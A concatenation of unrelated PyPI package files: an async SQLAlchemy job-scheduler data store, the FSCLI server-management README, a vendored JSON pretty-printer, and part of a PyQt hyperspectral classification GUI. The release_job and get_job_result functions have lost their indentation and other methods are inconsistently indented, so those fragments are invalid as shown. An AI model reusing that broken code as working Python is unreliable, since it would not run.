                JobDeserializationFailed(job_id=row.id, exception=exc)
            )

    return jobs
async def add_task(self, task: Task) -> None:
    """Insert the given task, or update the existing row when the ID is
    already taken; publishes TaskAdded or TaskUpdated accordingly."""
    insert = self.t_tasks.insert().values(
        id=task.id,
        func=callable_to_ref(task.func),
        max_running_jobs=task.max_running_jobs,
        misfire_grace_time=task.misfire_grace_time,
    )
    try:
        async for attempt in self._retry():
            with attempt:
                async with self.engine.begin() as conn:
                    await conn.execute(insert)
    except IntegrityError:
        # a task with this ID already exists -> update it in place
        update = (
            self.t_tasks.update()
            .values(
                func=callable_to_ref(task.func),
                max_running_jobs=task.max_running_jobs,
                misfire_grace_time=task.misfire_grace_time,
            )
            .where(self.t_tasks.c.id == task.id)
        )
        async for attempt in self._retry():
            with attempt:
                async with self.engine.begin() as conn:
                    await conn.execute(update)

        await self._events.publish(TaskUpdated(task_id=task.id))
    else:
        await self._events.publish(TaskAdded(task_id=task.id))
async def remove_task(self, task_id: str) -> None:
    """Delete the task with the given ID.

    Raises TaskLookupError when no such task exists; publishes a
    TaskRemoved event on success.
    """
    delete = self.t_tasks.delete().where(self.t_tasks.c.id == task_id)
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                result = await conn.execute(delete)
                if result.rowcount == 0:
                    raise TaskLookupError(task_id)

                await self._events.publish(TaskRemoved(task_id=task_id))
async def get_task(self, task_id: str) -> Task:
    """Fetch the task with the given ID.

    :raises TaskLookupError: if no task with that ID exists
    """
    # positional-column form of select(); the list form used previously
    # is the legacy 1.x calling style removed in SQLAlchemy 2.0, and the
    # rest of this module already uses the modern style
    query = select(
        self.t_tasks.c.id,
        self.t_tasks.c.func,
        self.t_tasks.c.max_running_jobs,
        self.t_tasks.c.state,
        self.t_tasks.c.misfire_grace_time,
    ).where(self.t_tasks.c.id == task_id)
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                result = await conn.execute(query)
                row = result.first()

            if row:
                return Task.unmarshal(self.serializer, row._asdict())
            else:
                raise TaskLookupError(task_id)
async def get_tasks(self) -> list[Task]:
    """Fetch all tasks, ordered by task ID."""
    # positional-column form of select(); the list form used previously
    # is the legacy 1.x calling style removed in SQLAlchemy 2.0
    query = select(
        self.t_tasks.c.id,
        self.t_tasks.c.func,
        self.t_tasks.c.max_running_jobs,
        self.t_tasks.c.state,
        self.t_tasks.c.misfire_grace_time,
    ).order_by(self.t_tasks.c.id)
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                result = await conn.execute(query)
                tasks = [
                    Task.unmarshal(self.serializer, row._asdict()) for row in result
                ]
                return tasks
async def add_schedule(
    self, schedule: Schedule, conflict_policy: ConflictPolicy
) -> None:
    """Insert the given schedule; an ID collision is resolved according
    to <conflict_policy> (raise, replace, or silently ignore).

    Publishes ScheduleAdded or ScheduleUpdated on success."""
    event: DataStoreEvent
    values = schedule.marshal(self.serializer)
    insert = self.t_schedules.insert().values(**values)
    try:
        async for attempt in self._retry():
            with attempt:
                async with self.engine.begin() as conn:
                    await conn.execute(insert)
    except IntegrityError:
        if conflict_policy is ConflictPolicy.exception:
            raise ConflictingIdError(schedule.id) from None
        elif conflict_policy is ConflictPolicy.replace:
            # keep the primary key, overwrite every other column
            del values["id"]
            update = (
                self.t_schedules.update()
                .where(self.t_schedules.c.id == schedule.id)
                .values(**values)
            )
            async for attempt in self._retry():
                with attempt:
                    async with self.engine.begin() as conn:
                        await conn.execute(update)

            event = ScheduleUpdated(
                schedule_id=schedule.id, next_fire_time=schedule.next_fire_time
            )
            await self._events.publish(event)
        # any other policy: the failed insert is silently ignored
    else:
        event = ScheduleAdded(
            schedule_id=schedule.id, next_fire_time=schedule.next_fire_time
        )
        await self._events.publish(event)
async def remove_schedules(self, ids: Iterable[str]) -> None:
    """Delete the schedules with the given IDs and publish a
    ScheduleRemoved event for each removed schedule."""
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                delete = self.t_schedules.delete().where(
                    self.t_schedules.c.id.in_(ids)
                )
                if self._supports_update_returning:
                    # RETURNING tells us exactly which rows were deleted
                    delete = delete.returning(self.t_schedules.c.id)
                    removed_ids: Iterable[str] = [
                        row[0] for row in await conn.execute(delete)
                    ]
                else:
                    # TODO: actually check which rows were deleted?
                    await conn.execute(delete)
                    removed_ids = ids

    for schedule_id in removed_ids:
        await self._events.publish(ScheduleRemoved(schedule_id=schedule_id))
async def get_schedules(self, ids: set[str] | None = None) -> list[Schedule]:
    """Fetch schedules ordered by ID, optionally restricted to the
    given set of schedule IDs."""
    statement = self.t_schedules.select().order_by(self.t_schedules.c.id)
    if ids:
        statement = statement.where(self.t_schedules.c.id.in_(ids))

    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                result = await conn.execute(statement)
                return await self._deserialize_schedules(result)
async def acquire_schedules(self, scheduler_id: str, limit: int) -> list[Schedule]:
    """Atomically claim up to <limit> due schedules for <scheduler_id>.

    A schedule is due when its next_fire_time is set and not in the
    future, and it is not currently held by another scheduler (no
    acquired_until, or the hold has expired)."""
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                now = datetime.now(timezone.utc)
                acquired_until = now + timedelta(seconds=self.lock_expiration_delay)
                # CTE selecting the IDs of the due, unclaimed schedules;
                # SKIP LOCKED lets concurrent schedulers pass over rows
                # already row-locked by another transaction
                schedules_cte = (
                    select(self.t_schedules.c.id)
                    .where(
                        and_(
                            self.t_schedules.c.next_fire_time.isnot(None),
                            self.t_schedules.c.next_fire_time <= now,
                            or_(
                                self.t_schedules.c.acquired_until.is_(None),
                                self.t_schedules.c.acquired_until < now,
                            ),
                        )
                    )
                    .order_by(self.t_schedules.c.next_fire_time)
                    .limit(limit)
                    .with_for_update(skip_locked=True)
                    .cte()
                )
                # NOTE(review): select([...]) is the legacy 1.x calling
                # style (removed in SQLAlchemy 2.0) — consider
                # select(schedules_cte.c.id)
                subselect = select([schedules_cte.c.id])
                update = (
                    self.t_schedules.update()
                    .where(self.t_schedules.c.id.in_(subselect))
                    .values(acquired_by=scheduler_id, acquired_until=acquired_until)
                )
                if self._supports_update_returning:
                    update = update.returning(*self.t_schedules.columns)
                    result = await conn.execute(update)
                else:
                    # no RETURNING support: update first, then re-select
                    # the rows this scheduler now holds
                    await conn.execute(update)
                    query = self.t_schedules.select().where(
                        and_(self.t_schedules.c.acquired_by == scheduler_id)
                    )
                    result = await conn.execute(query)

                schedules = await self._deserialize_schedules(result)

    return schedules
async def release_schedules(
    self, scheduler_id: str, schedules: list[Schedule]
) -> None:
    """Release schedules previously acquired by <scheduler_id>: persist
    the new trigger state and next fire time of still-active schedules,
    delete finished ones, then publish the corresponding events."""
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                update_events: list[ScheduleUpdated] = []
                finished_schedule_ids: list[str] = []
                update_args: list[dict[str, Any]] = []
                for schedule in schedules:
                    if schedule.next_fire_time is not None:
                        try:
                            serialized_trigger = self.serializer.serialize(
                                schedule.trigger
                            )
                        except SerializationError:
                            # an unserializable trigger cannot be stored;
                            # treat the schedule as finished
                            self._logger.exception(
                                "Error serializing trigger for schedule %r – "
                                "removing from data store",
                                schedule.id,
                            )
                            finished_schedule_ids.append(schedule.id)
                            continue

                        update_args.append(
                            {
                                "p_id": schedule.id,
                                "p_trigger": serialized_trigger,
                                "p_next_fire_time": schedule.next_fire_time,
                            }
                        )
                    else:
                        # no further fire times -> schedule is finished
                        finished_schedule_ids.append(schedule.id)

                # Update schedules that have a next fire time
                if update_args:
                    p_id: BindParameter = bindparam("p_id")
                    p_trigger: BindParameter = bindparam("p_trigger")
                    p_next_fire_time: BindParameter = bindparam("p_next_fire_time")
                    # executemany-style update keyed by schedule ID,
                    # releasing the lock columns at the same time
                    update = (
                        self.t_schedules.update()
                        .where(
                            and_(
                                self.t_schedules.c.id == p_id,
                                self.t_schedules.c.acquired_by == scheduler_id,
                            )
                        )
                        .values(
                            trigger=p_trigger,
                            next_fire_time=p_next_fire_time,
                            acquired_by=None,
                            acquired_until=None,
                        )
                    )
                    next_fire_times = {
                        arg["p_id"]: arg["p_next_fire_time"] for arg in update_args
                    }
                    # TODO: actually check which rows were updated?
                    await conn.execute(update, update_args)
                    updated_ids = list(next_fire_times)

                    for schedule_id in updated_ids:
                        event = ScheduleUpdated(
                            schedule_id=schedule_id,
                            next_fire_time=next_fire_times[schedule_id],
                        )
                        update_events.append(event)

                # Remove schedules that have no next fire time or failed to
                # serialize
                if finished_schedule_ids:
                    delete = self.t_schedules.delete().where(
                        self.t_schedules.c.id.in_(finished_schedule_ids)
                    )
                    await conn.execute(delete)

    # events are published only after the transaction has ended
    for event in update_events:
        await self._events.publish(event)

    for schedule_id in finished_schedule_ids:
        await self._events.publish(ScheduleRemoved(schedule_id=schedule_id))
async def get_next_schedule_run_time(self) -> datetime | None:
    """Return the earliest next_fire_time among all schedules, or None
    when no schedule has one."""
    # renamed the "statenent" typo local
    statement = (
        select(self.t_schedules.c.next_fire_time)
        .where(self.t_schedules.c.next_fire_time.isnot(None))
        .order_by(self.t_schedules.c.next_fire_time)
        .limit(1)
    )
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                result = await conn.execute(statement)
                return result.scalar()
async def add_job(self, job: Job) -> None:
    """Persist a new job and publish a JobAdded event."""
    insert = self.t_jobs.insert().values(**job.marshal(self.serializer))
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                await conn.execute(insert)

    await self._events.publish(
        JobAdded(
            job_id=job.id,
            task_id=job.task_id,
            schedule_id=job.schedule_id,
            tags=job.tags,
        )
    )
async def get_jobs(self, ids: Iterable[UUID] | None = None) -> list[Job]:
    """Fetch jobs ordered by ID, optionally restricted to the given
    job IDs."""
    statement = self.t_jobs.select().order_by(self.t_jobs.c.id)
    if ids:
        statement = statement.where(self.t_jobs.c.id.in_(list(ids)))

    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                result = await conn.execute(statement)
                return await self._deserialize_jobs(result)
    async def acquire_jobs(self, worker_id: str, limit: int | None = None) -> list[Job]:
        """Atomically claim up to *limit* pending jobs for *worker_id*.

        A job is claimable when it was never acquired or its previous claim
        has expired.  Per-task ``max_running_jobs`` limits are honored, the
        claimed rows get ``acquired_by``/``acquired_until`` set, the tasks'
        running-job counters are incremented, and a ``JobAcquired`` event is
        published for each claimed job.

        :param worker_id: identifier of the worker claiming the jobs
        :param limit: maximum number of jobs to claim (``None`` = no limit)
        :return: the claimed jobs, oldest first
        """
        async for attempt in self._retry():
            with attempt:
                async with self.engine.begin() as conn:
                    now = datetime.now(timezone.utc)
                    # Claims expire after lock_expiration_delay so jobs held by
                    # a crashed worker eventually become claimable again
                    acquired_until = now + timedelta(seconds=self.lock_expiration_delay)
                    # Unclaimed (or expired-claim) jobs, oldest first;
                    # skip_locked avoids blocking on rows other workers hold
                    query = (
                        self.t_jobs.select()
                        .join(self.t_tasks, self.t_tasks.c.id == self.t_jobs.c.task_id)
                        .where(
                            or_(
                                self.t_jobs.c.acquired_until.is_(None),
                                self.t_jobs.c.acquired_until < now,
                            )
                        )
                        .order_by(self.t_jobs.c.created_at)
                        .with_for_update(skip_locked=True)
                        .limit(limit)
                    )
                    result = await conn.execute(query)
                    if not result:
                        return []
                    # Mark the jobs as acquired by this worker
                    jobs = await self._deserialize_jobs(result)
                    task_ids: set[str] = {job.task_id for job in jobs}
                    # Retrieve the limits
                    # (free slots per task = max_running_jobs - running_jobs;
                    # tasks with no max are absent from the mapping below)
                    query = select(
                        [
                            self.t_tasks.c.id,
                            self.t_tasks.c.max_running_jobs
                            - self.t_tasks.c.running_jobs,
                        ]
                    ).where(
                        self.t_tasks.c.max_running_jobs.isnot(None),
                        self.t_tasks.c.id.in_(task_ids),
                    )
                    result = await conn.execute(query)
                    job_slots_left: dict[str, int] = dict(result.fetchall())
                    # Filter out jobs that don't have free slots
                    acquired_jobs: list[Job] = []
                    increments: dict[str, int] = defaultdict(lambda: 0)
                    for job in jobs:
                        # Don't acquire the job if there are no free slots left
                        slots_left = job_slots_left.get(job.task_id)
                        if slots_left == 0:
                            continue
                        elif slots_left is not None:
                            job_slots_left[job.task_id] -= 1

                        acquired_jobs.append(job)
                        increments[job.task_id] += 1

                    if acquired_jobs:
                        # Mark the acquired jobs as acquired by this worker
                        acquired_job_ids = [job.id for job in acquired_jobs]
                        update = (
                            self.t_jobs.update()
                            .values(
                                acquired_by=worker_id, acquired_until=acquired_until
                            )
                            .where(self.t_jobs.c.id.in_(acquired_job_ids))
                        )
                        await conn.execute(update)

                        # Increment the running job counters on each task
                        # (executemany with bound parameters, one row per task)
                        p_id: BindParameter = bindparam("p_id")
                        p_increment: BindParameter = bindparam("p_increment")
                        params = [
                            {"p_id": task_id, "p_increment": increment}
                            for task_id, increment in increments.items()
                        ]
                        update = (
                            self.t_tasks.update()
                            .values(
                                running_jobs=self.t_tasks.c.running_jobs + p_increment
                            )
                            .where(self.t_tasks.c.id == p_id)
                        )
                        await conn.execute(update, params)

                    # Publish the appropriate events
                    for job in acquired_jobs:
                        await self._events.publish(JobAcquired(job_id=job.id, worker_id=worker_id))

                    return acquired_jobs
async def release_job(
self, worker_id: str, task_id: str, result: JobResult
) -> None:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
# Record the job result
if result.expires_at > result.finished_at:
marshalled = result.marshal(self.serializer)
insert = self.t_job_results.insert().values(**marshalled)
await conn.execute(insert)
# Decrement the number of running jobs for this task
update = (
self.t_tasks.update()
.values(running_jobs=self.t_tasks.c.running_jobs - 1)
.where(self.t_tasks.c.id == task_id)
)
await conn.execute(update)
# Delete the job
delete = self.t_jobs.delete().where(
self.t_jobs.c.id == result.job_id
)
await conn.execute(delete)
async def get_job_result(self, job_id: UUID) -> JobResult | None:
async for attempt in self._retry():
with attempt:
async with self.engine.begin() as conn:
# Retrieve the result
query = self.t_job_results.select().where(
self.t_job_results.c.job_id == job_id
)
row = (await conn.execute(query)).first()
# Delete the result
delete = self.t_job_results.delete().where(
self.t_job_results.c.job_id == job_id
)
await conn.execute(delete)
return (
JobResult.unmarshal(self.serializer, row._asdict())
if row
else None
) | PypiClean |
/FSCLI-3.0.0.tar.gz/FSCLI-3.0.0/README.md | # FSCLI
### Thank you for visiting! 
FSCLI is a module that simplifies starting, stopping & deleting servers based on server_id and email.
## Installation
### Using `pip3`
You can install the FSCLI package using `pip3`. If you run into any errors or issues with `pip3`, you can instead install it from source using Git (see the instructions below).
```shell
~$ pip3 install --upgrade fscli
```
## Usages
These are the commands that you can run. Replace the placeholder inside the `<>` with your own value.
```shell
~$ python3 -m fscli --start --email <email> --server_id <server id>
~$ python3 -m fscli --stop_all --email <email>
~$ python3 -m fscli --stop --email <email> --server_id <server id>
~$ python3 -m fscli --destroy_all --email <email>
~$ python3 -m fscli --destroy --email <email> --server_id <server_id>
~$ python3 -m fscli --fraud_set --email <email>
```
## Installation From Source
### Cloning the Repository
If you are installing from source, be sure to have `git` installed on your machine.
```shell
~$ git clone https://github.com/fluidstackio/fscli.git
```
### Installing the packages
You can use `pip3` to install the packages required to run the package.
```shell
~$ cd FSCLI && sudo pip3 install -r requirements.txt
```
| PypiClean |
/Ngoto-0.0.39-py3-none-any.whl/ngoto/core/util/rich/json.py | from pathlib import Path
from json import loads, dumps
from typing import Any, Callable, Optional, Union
from .text import Text
from .highlighter import JSONHighlighter, NullHighlighter
class JSON:
    """A renderable which pretty prints JSON.

    Args:
        json (str): JSON encoded data.
        indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.
        highlight (bool, optional): Enable highlighting. Defaults to True.
        skip_keys (bool, optional): Skip keys not of a basic type. Defaults to False.
        ensure_ascii (bool, optional): Escape all non-ascii characters. Defaults to False.
        check_circular (bool, optional): Check for circular references. Defaults to True.
        allow_nan (bool, optional): Allow NaN and Infinity values. Defaults to True.
        default (Callable, optional): A callable that converts values that can not be encoded
            in to something that can be JSON encoded. Defaults to None.
        sort_keys (bool, optional): Sort dictionary keys. Defaults to False.
    """

    def __init__(
        self,
        json: str,
        indent: Union[None, int, str] = 2,
        highlight: bool = True,
        skip_keys: bool = False,
        ensure_ascii: bool = False,
        check_circular: bool = True,
        allow_nan: bool = True,
        default: Optional[Callable[[Any], Any]] = None,
        sort_keys: bool = False,
    ) -> None:
        # Round-trip through loads/dumps so the output is re-indented
        # (and optionally sorted) regardless of the input formatting.
        self.text = self._render(
            loads(json),
            indent=indent,
            highlight=highlight,
            skip_keys=skip_keys,
            ensure_ascii=ensure_ascii,
            check_circular=check_circular,
            allow_nan=allow_nan,
            default=default,
            sort_keys=sort_keys,
        )

    @classmethod
    def from_data(
        cls,
        data: Any,
        indent: Union[None, int, str] = 2,
        highlight: bool = True,
        skip_keys: bool = False,
        ensure_ascii: bool = False,
        check_circular: bool = True,
        allow_nan: bool = True,
        default: Optional[Callable[[Any], Any]] = None,
        sort_keys: bool = False,
    ) -> "JSON":
        """Encodes a JSON object from arbitrary data.

        Args:
            data (Any): An object that may be encoded in to JSON
            indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.
            highlight (bool, optional): Enable highlighting. Defaults to True.
            skip_keys (bool, optional): Skip keys not of a basic type. Defaults to False.
            ensure_ascii (bool, optional): Escape all non-ascii characters. Defaults to False.
            check_circular (bool, optional): Check for circular references. Defaults to True.
            allow_nan (bool, optional): Allow NaN and Infinity values. Defaults to True.
            default (Callable, optional): A callable that converts values that can not be encoded
                in to something that can be JSON encoded. Defaults to None.
            sort_keys (bool, optional): Sort dictionary keys. Defaults to False.

        Returns:
            JSON: New JSON object from the given data.
        """
        # Bypass __init__ because *data* is already decoded.
        json_instance: "JSON" = cls.__new__(cls)
        json_instance.text = cls._render(
            data,
            indent=indent,
            highlight=highlight,
            skip_keys=skip_keys,
            ensure_ascii=ensure_ascii,
            check_circular=check_circular,
            allow_nan=allow_nan,
            default=default,
            sort_keys=sort_keys,
        )
        return json_instance

    @staticmethod
    def _render(
        data: Any,
        *,
        indent: Union[None, int, str],
        highlight: bool,
        skip_keys: bool,
        ensure_ascii: bool,
        check_circular: bool,
        allow_nan: bool,
        default: Optional[Callable[[Any], Any]],
        sort_keys: bool,
    ) -> Text:
        """Serialize *data* to JSON and return it as (optionally highlighted)
        non-wrapping ``Text``.  Shared by ``__init__`` and ``from_data``."""
        encoded = dumps(
            data,
            indent=indent,
            skipkeys=skip_keys,
            ensure_ascii=ensure_ascii,
            check_circular=check_circular,
            allow_nan=allow_nan,
            default=default,
            sort_keys=sort_keys,
        )
        highlighter = JSONHighlighter() if highlight else NullHighlighter()
        text = highlighter(encoded)
        text.no_wrap = True
        text.overflow = None
        return text

    def __rich__(self) -> Text:
        return self.text
if __name__ == "__main__":
    import argparse
    import sys

    arg_parser = argparse.ArgumentParser(description="Pretty print json")
    arg_parser.add_argument(
        "path",
        metavar="PATH",
        help="path to file, or - for stdin",
    )
    arg_parser.add_argument(
        "-i",
        "--indent",
        metavar="SPACES",
        type=int,
        default=2,
        help="Number of spaces in an indent",
    )
    args = arg_parser.parse_args()

    from ngoto.core.util.rich.console import Console

    console = Console()
    error_console = Console(stderr=True)

    try:
        # "-" means read the JSON document from standard input
        if args.path == "-":
            json_data = sys.stdin.read()
        else:
            json_data = Path(args.path).read_text()
    except Exception as error:
        error_console.print(f"Unable to read {args.path!r}; {error}")
        sys.exit(-1)

    console.print(JSON(json_data, indent=args.indent), soft_wrap=True)
/HySpec-0.1.4.4.tar.gz/HySpec-0.1.4.4/spectralAdv/classificationViewer.py | from .specTools import *
from os import listdir
from os import remove
from os import path
from os.path import join
from sys import argv
from sys import exit
import csv
import shapefile
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from . import classificationResultsViewer
from . import classification
from . import specTools
class progressBar(QDialog):
    """Small dialog showing a text label above a progress bar.

    The dialog shows itself immediately upon construction; callers update
    ``self.progress`` to report completion.
    """

    def __init__(self, title=None, text=None, parent=None):
        super(progressBar, self).__init__(parent)
        self.setGeometry(150, 150, 200, 100)
        self.setWindowTitle(title)

        # Label describing the operation in progress
        self.text = QLabel()
        self.text.setText(text)

        # The progress bar itself
        self.progress = QProgressBar(self)

        # Stack the label above the bar
        layout = QVBoxLayout()
        layout.addWidget(self.text)
        layout.addWidget(self.progress)
        self.setLayout(layout)

        # Display the dialog right away
        self.show()
class classAnalysisGUI(QMainWindow):
def __init__(self, settings=None, imageDir="", parent=None):
super(classAnalysisGUI, self).__init__(parent)
self.setWindowTitle("Class Analysis")
self.setWindowIcon(QIcon('files_icon.ico'))
self.setGeometry(150, 150, 500, 800)
self.settings = settings
self.imageDir = imageDir
self.ROIdata = {}
self.wl = []
self.learners = {}
self.validation = {}
quitAction = QAction("Quit",self)
quitAction.setShortcut("Ctrl+Q")
quitAction.triggered.connect(self.cancel)
openROIAction = QAction("Open ROI csv file",self)
openROIAction.setShortcut("Ctrl+O")
openROIAction.triggered.connect(self.choose_ROI_file)
plotSelectedMeansAction = QAction("Plot Selected Class Means",self)
plotSelectedMeansAction.triggered.connect(self.plot_selected_means)
plotMeansAction = QAction("Plot All Class Means",self)
plotMeansAction.triggered.connect(self.plot_all_means)
classifyImageAction = QAction("Apply Classifier to an Image",self)
classifyImageAction.triggered.connect(self.classify_image)
# GUI Widgets
self.ROIfileText = QLabel()
self.ROIfileText.setText("No ROI file selected")
# list widget with table of ROIs
self.table_view = QTableWidget()
self.table_view.setSelectionBehavior(QAbstractItemView.SelectRows)
self.table_view.setRowCount(0)
self.table_view.setColumnCount(4)
self.table_view.setHorizontalHeaderLabels(['Name','Color','Num Points'])
self.table_view.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.table_view.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)
self.table_view.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)
self.table_view.setColumnWidth(3, 75) # ROI data
self.table_view.setColumnHidden(3, True)
self.table_view.verticalHeader().setAlternatingRowColors(True)
# add a horizontal seperator line
line1 = QFrame()
line1.setFrameShape(QFrame.HLine)
line1.setFrameShadow(QFrame.Sunken)
self.SelectAllMethodsCheckBox = QCheckBox('Select All Methods and Plots', self)
self.SelectAllMethodsCheckBox.stateChanged.connect(self.SelectAllMethodsCheckBoxChanged)
# add a horizontal seperator line
line2 = QFrame()
line2.setFrameShape(QFrame.HLine)
line2.setFrameShadow(QFrame.Sunken)
self.ClassMethodsSectionText = QLabel()
self.ClassMethodsSectionText.setText("Select Calssification Methods:")
self.LDAclassificationCheckBox = QCheckBox('Linear Discriminant Analysis', self)
self.QDAclassificationCheckBox = QCheckBox('Quadratic Discriminant Analysis', self)
self.RFclassificationCheckBox = QCheckBox('Random Forest', self)
self.DTclassificationCheckBox = QCheckBox('Decision Tree', self)
self.ScatterplotMethodsSectionText = QLabel()
self.ScatterplotMethodsSectionText.setText("Select Scatterplot Methods:")
self.ScatterplotPCACheckBox = QCheckBox('PCA Dimension Reduction Scatterplot', self)
self.ScatterplotLDACheckBox = QCheckBox('LDA Dimension Reduction Scatterplot', self)
# add a horizontal seperator line
line3 = QFrame()
line3.setFrameShape(QFrame.HLine)
line3.setFrameShadow(QFrame.Sunken)
# OK and Cancel buttons
self.btn_analysis = QPushButton("Run Analysis")
self.btn_analysis.clicked.connect(self.full_analysis)
# Layout
self.widget_central = QWidget()
self.vbox = QVBoxLayout()
self.widget_central.setLayout(self.vbox)
self.vbox.addWidget(self.ROIfileText)
self.vbox.addWidget(self.table_view)
self.vbox.addSpacing(5)
self.vbox.addWidget(self.SelectAllMethodsCheckBox)
self.vbox.addSpacing(5)
self.vbox.addWidget(line1)
self.vbox.addWidget(self.ClassMethodsSectionText)
self.vbox.addWidget(self.LDAclassificationCheckBox)
self.vbox.addWidget(self.QDAclassificationCheckBox)
self.vbox.addWidget(self.RFclassificationCheckBox)
self.vbox.addWidget(self.DTclassificationCheckBox)
self.vbox.addSpacing(10)
self.vbox.addWidget(line2)
self.vbox.addWidget(self.ScatterplotMethodsSectionText)
self.vbox.addWidget(self.ScatterplotPCACheckBox)
self.vbox.addWidget(self.ScatterplotLDACheckBox)
self.vbox.addSpacing(10)
self.vbox.addWidget(line3)
self.vbox.addWidget(self.btn_analysis)
# set as central widget and dock widget
self.setCentralWidget(self.widget_central)
# Add Menubar
mainMenu = self.menuBar()
fileMenu = mainMenu.addMenu("&File ")
fileMenu.addAction(openROIAction)
fileMenu.addAction(quitAction)
fileMenu = mainMenu.addMenu("&Plots ")
fileMenu.addAction(plotSelectedMeansAction)
fileMenu.addAction(plotMeansAction)
fileMenu = mainMenu.addMenu("&Classify Image ")
fileMenu.addAction(classifyImageAction)
    def not_supportrd(self):
        """Show a dialog telling the user the feature is not implemented.

        NOTE(review): the method name is misspelled ("supportrd"); it is kept
        unchanged because callers may reference it by this exact name.
        """
        QMessageBox.information(self, "Not Supported","That functionality is not yet supported.")
    def select_ROIs_message(self):
        """Warn the user that at least two ROIs must be selected in the table
        before running an analysis (see full_analysis)."""
        QMessageBox.information(self, "No ROIs Selected","At least two ROIs must be selected.\n To Select all ROIs use the top-left box in the table.")
def cancel(self):
sys.exit()
    def plot_selected_means(self):
        """Plot mean spectrum +/- 1 std-dev for each ROI selected in the table.

        Does nothing when no rows are selected.  Falls back to band indices on
        the x-axis when an ROI's band count differs from the image wavelengths.

        NOTE(review): ``plt`` and ``np`` are assumed to come from the
        ``from .specTools import *`` star import — confirm.
        """
        # determine the selected ROIs
        SelectedROIdata = {}   # NOTE(review): unused in this method
        selected_rows = sorted(set(index.row() for index in
                                   self.table_view.selectedIndexes()))

        # return if no rows are selected
        if len(selected_rows) < 1:
            return

        # plot the class means
        fig, ax = plt.subplots()
        for rowIdx in selected_rows:
            # hidden column 3 holds the ROI key for this row
            key = self.table_view.item(rowIdx,3).text()
            spectra = self.ROIdata[key].spectra
            mean = np.mean(spectra,0)
            std = np.std(spectra,0)
            if len(self.wl) == len(mean):
                wl = self.wl
            else:
                # band-count mismatch: warn and plot against band indices
                print('Number Band Mismatch: ('+self.ROIdata[key].name+')')
                print('Number ROI Bands: '+str(len(mean)))
                print('Number Image Bands: '+str(len(self.wl)))
                wl = range(len(mean))
            # color is stored 0-255; matplotlib expects 0-1
            ax.plot(wl, mean, label=self.ROIdata[key].name, color=self.ROIdata[key].color/255.)
            ax.fill_between(wl, mean-std, mean+std, alpha=0.2, color=self.ROIdata[key].color/255.)
        ax.set(xlabel='Wavelength', title='Class Means +/- 1 Standard Deviation')
        ax.legend()
        plt.show()
    def set_loading_progressbar(self, title, text):
        """Create and show a modal progress dialog (range 0-100).

        The dialog is stored on ``self.progressDialog`` so callers can update
        its value and close it later.
        """
        self.progressDialog = QProgressDialog(self)
        self.progressDialog.setMinimum(0)
        self.progressDialog.setLabelText(text)
        self.progressDialog.setMaximum(100)
        self.progressDialog.setWindowTitle(title)
        #self.dialog.setCancelButton(None)
        self.progressDialog.setModal(True)
        self.progressDialog.show()
    def set_loading_progressbar2(self, title, text):
        """Alternative progress-dialog constructor.

        NOTE(review): appears experimental/unused — it ignores *title* and
        *text*, uses a fixed message, and never shows the dialog.
        """
        self.progressDialog = QProgressDialog("Operation in progress.", "Cancel", 0, 100)
    def plot_all_means(self):
        """Plot mean spectrum +/- 1 std-dev for every ROI in the table.

        Same plotting logic as plot_selected_means, but over all rows.
        NOTE(review): ``plt`` and ``np`` are assumed to come from the
        ``from .specTools import *`` star import — confirm.
        """
        # plot the class means
        fig, ax = plt.subplots()
        for rowIdx in range(self.table_view.rowCount()):
            # hidden column 3 holds the ROI key for this row
            key = self.table_view.item(rowIdx,3).text()
            spectra = self.ROIdata[key].spectra
            mean = np.mean(spectra,0)
            std = np.std(spectra,0)
            if len(self.wl) == len(mean):
                wl = self.wl
            else:
                # band-count mismatch: warn and plot against band indices
                print('Number Band Mismatch: ')
                print('Number ROI Bands: '+str(len(mean)))
                print('Number Image Bands: '+str(len(self.wl)))
                wl = range(len(mean))
            # color is stored 0-255; matplotlib expects 0-1
            ax.plot(wl, mean, label=self.ROIdata[key].name, color=self.ROIdata[key].color/255.)
            ax.fill_between(wl, mean-std, mean+std, alpha=0.2, color=self.ROIdata[key].color/255.)
        ax.set(xlabel='Wavelength', title='Class Means +/- 1 Standard Deviation')
        ax.legend()
        plt.show()
def SelectAllMethodsCheckBoxChanged(self):
if self.SelectAllMethodsCheckBox.isChecked():
self.LDAclassificationCheckBox.setChecked(True)
self.QDAclassificationCheckBox.setChecked(True)
self.RFclassificationCheckBox.setChecked(True)
self.DTclassificationCheckBox.setChecked(True)
self.ScatterplotPCACheckBox.setChecked(True)
self.ScatterplotLDACheckBox.setChecked(True)
else:
self.LDAclassificationCheckBox.setChecked(False)
self.QDAclassificationCheckBox.setChecked(False)
self.RFclassificationCheckBox.setChecked(False)
self.DTclassificationCheckBox.setChecked(False)
self.ScatterplotPCACheckBox.setChecked(False)
self.ScatterplotLDACheckBox.setChecked(False)
    class ColorDelegate(QStyledItemDelegate):
        """Item delegate that paints a cell's selection highlight with the
        QColor stored in the item's Qt.UserRole data."""
        def paint(self, painter, option, index):
            # Use the per-item color (set when the table was populated)
            # as the highlight color for this cell
            color = index.data(Qt.UserRole)
            option.palette.setColor(QPalette.Highlight, color)
            QStyledItemDelegate.paint(self, painter, option, index)
    def choose_ROI_file(self):
        """Ask the user for an ROI csv file, load it, and populate the table.

        Fills one row per ROI with name, color swatch, point count and (in
        hidden column 3) the ROI's internal key.  Also sets ``self.wl``.

        NOTE(review): ``self.wl`` is taken from whichever ROI the loop
        visited last (loop-variable leak) — presumably all ROIs share one
        wavelength axis; confirm.
        """
